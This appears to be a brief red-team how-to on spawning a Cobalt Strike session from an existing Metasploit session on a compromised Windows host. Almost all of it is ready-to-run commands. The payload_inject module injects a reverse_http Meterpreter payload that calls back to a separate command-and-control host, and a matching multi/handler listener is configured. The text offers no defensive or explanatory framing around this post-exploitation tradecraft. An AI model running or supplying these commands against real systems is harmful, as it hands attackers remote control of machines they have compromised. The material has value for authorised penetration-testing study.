Spawning a Cobalt Strike Session from MSF

Using Metasploit to spawn a Cobalt Strike session

Information.

metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

Use the payload_inject module to inject a new payload.

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

When setting up the listener, change LHOST and LPORT to the IP and PORT of Cobalt Strike.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true
run